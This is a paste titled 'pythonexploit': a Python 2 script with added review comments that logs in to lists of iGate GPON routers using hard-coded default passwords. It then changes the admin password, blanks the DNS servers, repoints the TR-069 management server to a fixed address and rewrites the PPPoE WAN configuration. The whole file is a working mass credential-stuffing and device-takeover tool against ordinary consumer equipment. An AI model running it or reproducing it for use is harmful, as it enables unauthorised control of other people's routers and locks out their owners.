hackernix

pythonexploit

Mar 20th, 2019
  1. import requests
  2. import base64
  3. import re
  4. import sys
  5. import urllib
  6.  
# URL = ''
# Fallback for the new device password: the __main__ block substitutes it when
# the operator answers the raw_input() prompt with an empty line.  It is also
# one of the candidate passwords in do_config()'s credential table.
DEFAULT_PWD = "vnpt@security"
  9.  
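def get_cookies(uname, passwd):
    """Return the single-entry cookie dict used to authenticate to a device.

    The value is an HTTP Basic credential, ``"Basic " + base64("user:pass")``.
    do_config() does not send it as a header: it loads this dict into a
    ``RequestsCookieJar``, so it travels as a cookie named ``Authorization``.

    The original concatenated the raw ``base64.b64encode`` result onto a text
    string, which only works on Python 2 (on Python 3 ``b64encode`` returns
    ``bytes`` and the ``+`` raises TypeError).  Encoding the credential to bytes
    first and decoding the Base64 text afterwards yields the same value on
    both interpreters.  (On Python 2 a non-ASCII byte-string password would
    trip the implicit ASCII decode inside ``.encode`` -- assumed ASCII there.)
    """
    credential = "{}:{}".format(uname, passwd).encode("utf-8")
    token = base64.b64encode(credential).decode("ascii")
    return {"Authorization": "Basic " + token}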
  12.  
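def is_ip(string):
    """Return True if *string* is a dotted-quad IPv4 address.

    Two defects of the original four-group regex are fixed:
      * octets were not range-checked, so ``"256.1.1.1"`` was accepted;
      * the pattern was anchored with ``$``, which also matches just before a
        trailing newline, so ``"1.2.3.4\\n"`` was accepted.  The whole-string
        anchors used here reject it.
    """
    if re.match(r"\A\d{1,3}(?:\.\d{1,3}){3}\Z", string) is None:
        return False
    # Shape is right; now reject any octet above 255 (digits-only, so never negative).
    return all(int(octet) <= 255 for octet in string.split("."))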
  15.  
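def is_url(string):
    """Return True if *string* starts with ``http://``/``https://`` and has a dotted host.

    The original pattern began with ``[http://|https://]``.  That is a character
    class, not an alternation: it matches any ONE of the characters
    ``h t p : / | s``, so ``"s.com"`` passed as a URL while the scheme the
    author evidently meant to require was never checked.  The scheme is now
    matched explicitly; the remainder of the pattern (something, a dot, then
    2-4 further characters) is kept as in the original, and the match is still
    a prefix match as before.
    """
    return re.match(r"^https?://.+\..{2,4}", string) is not None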
  18.  
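def log_error(err):
    """Append one line, *err*, to the error log file.

    The log path is hard-coded (the commented-out alternative below writes to
    the current directory instead).  A ``with`` block replaces the manual
    open/write/close of the original so the handle is released even when the
    write raises; the line format is unchanged.
    """
    # f = open("igate_error_log.txt", "a")
    with open("/root/Desktop/igate_error_log.txt", "a") as f:
        f.write("{}\n".format(err))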
  24.  
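def log_success(url):
    """Append *url*, minus its scheme, to the success log file.

    do_config() passes a ``"<url>|<ppp_user>"`` string.  The original dropped a
    fixed seven characters (the length of ``"http://"``), which left a stray
    ``"/"`` at the front of ``https://`` entries and mangled anything without a
    scheme; the scheme is now removed by name, and a string with no scheme is
    logged as-is.  The file handle is released by the ``with`` block.
    """
    for scheme in ("http://", "https://"):
        if url.startswith(scheme):
            url = url[len(scheme):]
            break
    # f = open("igate_success_log.txt", "a")
    with open("/root/Desktop/igate_success_log.txt", "a") as f:
        f.write("{}\n".format(url))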
  30.    
def do_config(url):
    """Log in to the device at *url* and push this script's configuration to it.

    Steps, in order (each one is a plain GET against the device's CGI pages):
      1. try the credential table below until one account/password pair logs
         in, and change that account's password to the module global
         ``new_pass`` (set by the __main__ block);
      2. set both DNS servers to 0.0.0.0 on the first interface whose name
         contains "ppp";
      3. resubmit the TR-069 settings with the ACS URL fixed to
         http://10.149.247.147:8091 and the other fields as read back;
      4. disable HTTP and SSH remote access on that ppp interface;
      5. re-create the PPPoE WAN entry on veip0 with the firewall flag set.
    The outcome goes to log_error()/log_success(); nothing is returned.

    What this looks like from the device side or an upstream HTTP log: one
    client presenting a Basic credential in a cookie named "Authorization",
    hitting password.cgi, then dnscfg/dnsconfg, tr69cfg/tr69confg, scinflt.cmd,
    wancfg.cmd, wanL3Edit.cmd, gponwan.cmd and tempstore.cgi in quick
    succession.  The old and new admin passwords and the PPPoE password are
    carried in cleartext in the query strings of those requests.

    Caveats visible in this body (none of them are fixed here):
      * the bare ``except: pass`` around the login loop also swallows
        KeyboardInterrupt, so Ctrl-C during that phase never reaches the
        KeyboardInterrupt handler in __main__;
      * ``noMcastVlanFilterNat`` is only assigned when enblGponWan == '1', and
        ``ppp_user`` only when a ppp WAN interface is found; otherwise the later
        use raises NameError, which the outer handler logs as an error;
      * the outer error handler references ``ip``, which is neither a parameter
        nor a local -- it resolves to the module global set by the __main__
        loop, so calling do_config() from anywhere else would raise NameError
        inside the handler;
      * only the very last request in this function carries a timeout; every
        other GET can block indefinitely on an unresponsive device;
      * no response is checked after a configuration request -- each
        "successfully" message is printed unconditionally.
    """
    # `global` is only needed for assignment; this function merely reads new_pass.
    global new_pass
    # credentials = [('operator', DEFAULT_PWD)]
    # Account -> candidate passwords, tried in order until one logs in.
    credentials = [('operator', ['operator', 'oper@tor', 'vnpt@security']), ('admin', ['admin', 'vnpt@security'])]
    # Loop change password
    success = False
    print "[+] Processing {}".format(url)
    for cred in credentials:
        try:
            uname, passwords = cred[0], cred[1]
            logged_in = False
            for passwd in passwords:
                if logged_in:
                    break
                # The Basic credential goes into the cookie jar (cookie named
                # "Authorization"), not into an HTTP header -- see get_cookies().
                cookies = get_cookies(uname, passwd)
                cj = requests.cookies.RequestsCookieJar()
                requests.utils.add_dict_to_cookiejar(cj, cookies)
                with requests.Session() as c:
                    c.cookies = cj
                    res = c.get(url)
                    # Login heuristic: the authenticated page contains this HTML comment.
                    if "<!-- hide" in res.content:
                        logged_in = True
                        print "[i] Login successfully with {}".format(uname)
                        # Change password
                        # Old and new passwords are interpolated unescaped; a value
                        # containing '&' or '#' would alter the request.
                        c.get(url + "/password.cgi?inUserName={}&inPassword={}&inOrgPassword={}".format(uname, new_pass, passwd))
                        print "Change {} password successfully".format(uname)
                        # cj2, used for the configuration phase below, is built only
                        # for the FIRST account that logs in; any later account still
                        # gets its password changed but is not used afterwards.
                        if not success:
                            success = True
                            cj2 = requests.cookies.RequestsCookieJar()
                            cookies = get_cookies(uname, new_pass)
                            requests.utils.add_dict_to_cookiejar(cj2, cookies)
        except:
            # Bare except: connection errors, parsing errors and KeyboardInterrupt
            # alike are discarded and the next account is tried.
            pass
    if not success:
        print "[!] Can't login with default credentials"
        # url[7:] assumes an "http://" prefix.
        log_error("{}: Login failed".format(url[7:]))
        print "+-----------------+\n"
        return
    # Comment out this try catch block for debugging
    try:
        # cj2 is guaranteed to be bound here by the early return above.
        with requests.Session() as c:
            c.cookies = cj2
            # print requests.utils.dict_from_cookiejar(cj2)
            # Change DNS server
            dns_ifs = []
            dns_res = c.get(url + "/dnscfg.html").content
            # v2: an empty body means the page lives under the alternative name;
            # the matching .cgi endpoint is chosen accordingly below.
            v2 = False
            if dns_res == "":
                dns_res = c.get(url + "/dnsconfg.html").content
                v2 = True
            if dns_res != "":
                # The generator's loop variable `c` shadows the session `c` only
                # inside the expression (generator scope), so the session is intact.
                # findall(...)[0] raises IndexError if the marker is absent; that is
                # caught by the outer handler and logged.
                dns_ifs += (c.split('/')[1] for c in re.findall("var\s*interfaceInfo\s*=\s*'(.+?)';", dns_res)[0].split('|'))      
                c_dns = [ifs for ifs in dns_ifs if "ppp" in ifs]
                if len(c_dns) != 0:
                    # print "Select DNS: {}".format(c_dns[0])
                    # Both DNS servers are set to the literal 0.0.0.0; how the device
                    # interprets that value is not determinable from this script.
                    if not v2:
                        c.get(url + "/dnscfg.cgi?dnsIfcsList={}&dnsPrimary=0.0.0.0&dnsSecondary=0.0.0.0&dnsRefresh=0&dns6Type=Static".format(c_dns[0]))
                    else:
                        c.get(url + "/dnsconfg.cgi?dnsIfcsList={}&dnsPrimary=0.0.0.0&dnsSecondary=0.0.0.0&dnsRefresh=0&dns6Type=Static".format(c_dns[0]))
                    print "Change DNS successfully"
            else:
                print "DNS configuration not found"
            # Change TR-069 server
            tr_069_res = c.get(url + "/tr69cfg.html").content
            v2 = False
            if tr_069_res == "":
                v2 = True
                tr_069_res = c.get(url + "/tr69confg.html").content
            if tr_069_res != "":
                # Every field except the ACS URL is read back from the page and
                # resubmitted unchanged; only the four user/password values are
                # URL-quoted.  Any findall(...)[0] below raises IndexError when the
                # page layout differs (caught by the outer handler).
                enblInform = re.findall("enblInform\s*=\s*'(\d{1})';", tr_069_res)[0]
                informInterval = re.findall("informInterval\.value\s*=\s*'(\d+)';", tr_069_res)[0]
                tr69cAcsUser = urllib.quote(re.findall("acsUser\.value\s*=\s*'(.*)';", tr_069_res)[0])
                tr69cAcsPwd = urllib.quote(re.findall("acsPwd\.value\s*=\s*'(.*)';", tr_069_res)[0])
                tr69cConnReqUser = urllib.quote(re.findall("connReqUser\.value\s*=\s*'(.*)';", tr_069_res)[0])
                tr69cConnReqPwd = urllib.quote(re.findall("connReqPwd\.value\s*=\s*'(.*)';", tr_069_res)[0])
                tr69cNoneConnReqAuth = re.findall("enblNoneConnReqAuth\s*=\s*'(\d{1})';", tr_069_res)[0]
                tr69cDebugEnable = re.findall("enblDebug\s*=\s*'(\d{1})';", tr_069_res)[0]
                tr69cBoundIfName = re.findall("var\s*boundIfName\s*=\s*'(.*)';", tr_069_res)[0]
                # The ACS URL is hard-coded to http://10.149.247.147:8091 in both variants.
                if v2:
                    c.get(url + "/tr69confg.cgi?tr69cInformEnable={}&tr69cInformInterval={}&tr69cAcsURL=http://10.149.247.147:8091&tr69cAcsUser={}&tr69cAcsPwd={}&tr69cConnReqUser={}&tr69cConnReqPwd={}&tr69cNoneConnReqAuth={}&tr69cDebugEnable={}&tr69cBoundIfName={}".format(enblInform, informInterval, tr69cAcsUser, tr69cAcsPwd, tr69cConnReqUser, tr69cConnReqPwd, tr69cNoneConnReqAuth, tr69cDebugEnable, tr69cBoundIfName))
                else:
                    c.get(url + "/tr69cfg.cgi?tr69cInformEnable={}&tr69cInformInterval={}&tr69cAcsURL=http://10.149.247.147:8091&tr69cAcsUser={}&tr69cAcsPwd={}&tr69cConnReqUser={}&tr69cConnReqPwd={}&tr69cNoneConnReqAuth={}&tr69cDebugEnable={}&tr69cBoundIfName={}".format(enblInform, informInterval, tr69cAcsUser, tr69cAcsPwd, tr69cConnReqUser, tr69cConnReqPwd, tr69cNoneConnReqAuth, tr69cDebugEnable, tr69cBoundIfName))
                print "Successfully change TR-069 server to default"
            else:
                print "TR-069 configuration not found"
            #return
            # Disable remote access via ssh and web for PPPoE interface
            ra_res = c.get(url + "/scinflt.cmd?action=remoteview").content
            ra_ifs = []
            # Same interfaceInfo parsing as the DNS step; same IndexError caveat.
            ra_ifs += (c.split('/')[1] for c in re.findall("var\s*interfaceInfo\s*=\s*'(.+?)';", ra_res)[0].split('|'))
            ra_interface = [ifs for ifs in ra_ifs if "ppp" in ifs]
            if len(ra_interface) != 0:
                # accesshttp=0 / accessssh=0 on ports 80 and 22 for the first ppp interface.
                c.get(url + "/scinflt.cmd?action=remoteset&wanIf={0}&ipver=4&protocol=1&accesshttp=0&fltNamehttp=HTTP_{0}&dstPorthttp=80&accessssh=0&fltNamessh=SSH_{0}&dstPortssh=22".format(ra_interface[0]))
            # Printed even when no ppp interface was found and nothing was sent.
            print "Successfully disable remote access on PPPoE interface"
            # Enable firewall
            fw_res = c.get(url + "/wancfg.cmd").content
            fw_ifs = re.findall("<td align='center'><input type='button' onClick='editClick\(\"(.+?)\", \"", fw_res)
            if len(fw_ifs) != 0:
                # `i` is the first WAN interface name containing "ppp"; the trailing
                # [0] raises IndexError when there is none (caught by the outer handler).
                i = [i for i in fw_ifs if "ppp" in i][0]
                res = c.get(url + "/wanL3Edit.cmd?serviceId=1&wanIfName={}&ntwkPrtcl=12".format(i)).content
                req1 = "/gponwan.cmd?action=add&ifname=veip0&wanIdx=2&connMode=1"
                c.get(url + req1)
                # The PPPoE username, password and MTU are read from the edit page and
                # re-sent unescaped in req2 and req3; a special character in any of
                # them would corrupt the request and hence the re-created WAN entry.
                ppp_user = re.findall("pppUserName\.value\s*=\s*'(.+)';", res)[0]
                ppp_password = re.findall("pppPassword\.value\s*=\s*'(.+)';", res)[0]
                ppp_mtu = re.findall("pppMtuSize\.value\s*=\s*'(.+)';", res)[0]
                req2 = "/tempstore.cgi?wanL2IfName=veip0&enblEnetWan=0&ntwkPrtcl=12&enblIpVer=0&serviceName=pppoe_veip0&pppUserName={}&pppPassword={}&pppMTU={}&ethMtu=1500".format(ppp_user, ppp_password, ppp_mtu)
                c.get(url + req2)
                # Remaining WAN flags are read back from the page and resubmitted as-is.
                enblNatppp = re.findall("var\s*natppp\s*=\s*'(\d{1})';", res)[0]
                enblOnDemand = re.findall("var\s*onDemand\s*=\s*'(\d{1})';", res)[0]
                enblFirewallppp = re.findall("var\s*firewallppp\s*=\s*'(\d{1})';", res)[0]
                pppTimeOut = re.findall("var\s*timeOut\s*=\s*'(\d{1})';", res)[0]
                enblIpAddr = re.findall("var\s*enblIpAddr\s*=\s*'(\d{1})';", res)[0]
                cfgL2tpAc = re.findall("var\s*cfgL2tpAc\s*=\s*'(\d{1})';", res)[0]
                localIpAddr = re.findall("var\s*localIpAddr\s*=\s*'(.+)';", res)[0]
                ipExtension = re.findall("var\s*ipExtension\s*=\s*'(\d{1})';", res)[0]
                enblFullconeNat = re.findall("var\s*fullconeNat\s*=\s*'(\d{1})';", res)[0]
                # The one value this step actually changes (enblFirewallppp, read above, is unused).
                enblFirewall = 1
                authMethod = re.findall("var\s*authMethod\s*=\s*'(\d{1})';", res)[0]
                pppAuthErrorRetry = re.findall("var\s*pppAuthErrorRetry\s*=\s*'(\d{1})';", res)[0]
                enblPppDebug = re.findall("var\s*pppDebug\s*=\s*'(\d{1})';", res)[0]
                enblIgmp = re.findall("var\s*enableIgmp\s*=\s*'(\d{1})';", res)[0]
                enblGponWan = re.findall("var\s*enblGponWan\s*=\s*'(\d{1})';", res)[0]
                noMcastVlanFlt = re.findall("var\s*noMcastVlanFlt\s*=\s*'(\d{1})';", res)[0]
                # NOTE(review): noMcastVlanFilterNat stays unbound when enblGponWan != '1';
                # the req3 .format() below then raises NameError (caught by the outer handler).
                if enblGponWan == '1':
                    if noMcastVlanFlt == '1':
                        noMcastVlanFilterNat = 1
                    else:
                        noMcastVlanFilterNat = 0

                # Both branches assign the same pppLocalIpAddress; only the flag differs.
                if enblIpAddr == '1' and cfgL2tpAc != '1':
                    useStaticIpAddress = 1
                    pppLocalIpAddress = localIpAddr
                else:
                    useStaticIpAddress = 0
                    pppLocalIpAddress = localIpAddr
                # pppIpExtension is sent as the literal 0 (ipExtension, read above, is unused).
                req3 = "/tempstore.cgi?serviceId=1&wanL2IfName=veip0&wanIdx=2&enblEnetWan=0&ntwkPrtcl=12&enVlanMux=1&vlanMuxId=11&vlanMuxPr=0&vlanTpid=33024&enblIpVer=0&serviceName=pppoe_veip0&pppUserName={0}&pppPassword={1}&pppMTU={2}&enblOnDemand={3}&pppTimeOut={4}&useStaticIpAddress={5}&pppLocalIpAddress={6}&pppIpExtension={7}&enblNat={8}&enblFullcone={9}&enblFirewall={10}&pppAuthMethod={11}&pppAuthErrorRetry={12}&enblPppDebug={13}&pppToBridge=0&enblIgmp={14}&noMcastVlanFilter={15}&defaultGatewayList={16}&dnsIfcsList={16}&dnsPrimary=0.0.0.0&dnsSecondary=0.0.0.0&dnsRefresh=0".format(ppp_user, ppp_password, ppp_mtu, enblOnDemand, pppTimeOut, useStaticIpAddress, pppLocalIpAddress, 0, enblNatppp, enblFullconeNat, enblFirewall, authMethod, pppAuthErrorRetry, enblPppDebug, enblIgmp, noMcastVlanFilterNat, i)
                c.get(url + req3)
                req4 = "/wancfg.cmd?action=add&ifname=veip0&wanIdx=2&connMode=1"
                # The only request in this function with a timeout; any failure is
                # ignored -- presumably because applying the WAN entry can make the
                # device stop answering, TODO confirm.
                try:
                    c.get(url + req4, timeout = 3)
                except:
                    pass
                print "Successfully enable firewall"
            # NOTE(review): ppp_user is bound only inside the block above, so this line
            # raises NameError (logged as an error) when no ppp WAN interface exists.
            log_success("{}|{}".format(url, ppp_user))
            print "+-----------------+\n"
    except Exception as e:
        print "[!] Error: {}".format(str(e))
        # `ip` is neither a parameter nor a local of this function -- see the docstring.
        log_error("{}: {}".format(ip, str(e)))
        print "+-----------------+\n"
  180.  
  181.    
# Entry point: read one host per line from the file named on the command line,
# keep those that are an IPv4 address or an http(s) URL, probe each once, and
# hand the ones whose front page matches the GPON ONT check to do_config().
# `new_pass` and `ip` are assigned at module level here and are read by
# do_config() as globals (it declares `global new_pass` and references `ip`
# in its error handler), so this block must run before do_config() is called.
if __name__ == "__main__":
    # NOTE(review): never read -- do_config() carries its own credential table,
    # so this list (and the commented variant) is dead code.
    credentials = [('operator', 'operator'), ('operator', 'oper@tor'), ('admin', 'admin')]
    # credentials = [('operator', DEFAULT_PWD), ('operator', 'oper@tor'), ('admin', 'admin')]
    if len(sys.argv) == 1:
        print "[!] Please specific file that contain ip to config"
        sys.exit(1)
    # Opened for the whole run and never closed explicitly; a `with` block would
    # release it on normal exit, on sys.exit() and on an error.
    ips = open(sys.argv[1])
    try:
        # raw_input is Python 2 only (this file also uses print statements).
        new_pass = raw_input("Input new password, press [Enter] if you want to use the default: ")
        if new_pass == "":
            new_pass = DEFAULT_PWD
        for ip in ips:
            # strip('/') runs before strip(): a line such as "1.2.3.4/\n" keeps its
            # trailing slash, because the newline still sits behind it when '/' is
            # stripped, and the line is then rejected by the validators below.
            ip = ip.strip('/').strip()
            if not is_ip(ip) and not is_url(ip):
                print "[!] {} is not an valid IP address/url".format(ip)
                continue
            else:
                if is_url(ip):
                    url = ip
                else:
                    # The extra .strip() is redundant; ip was stripped above.
                    url = 'http://' + ip.strip()
            print "Trying: {}".format(url)
            try:
                # Initial reachability probe; unlike do_config() this one has a timeout.
                res = requests.get(url, timeout=3).content
            except Exception as e:
                print "[!] Error: {}".format(str(e))
                print "[i] Skipping..."
                print "+-----------------+\n"
                log_error("{}: {}".format(ip, str(e)))
                continue
            # NOTE(review): this parses as ("iGate") and ("GPON ONT" in res); the
            # non-empty literal is always truthy, so only "GPON ONT" is tested --
            # the "iGate" substring is never checked, contrary to the message below.
            if "iGate" and "GPON ONT" in res:
                do_config(url)
            else:
                print "[!] {} is not using ONU GPON iGate, skipping...".format(url)
                print "+-----------------+\n"
                log_error("{}: Not GPON igate".format(ip))
    except KeyboardInterrupt:
        # Only reached for Ctrl-C outside do_config()'s login loop, whose bare
        # except swallows KeyboardInterrupt.
        print "[i] Canceled by user, exitting..."
        sys.exit()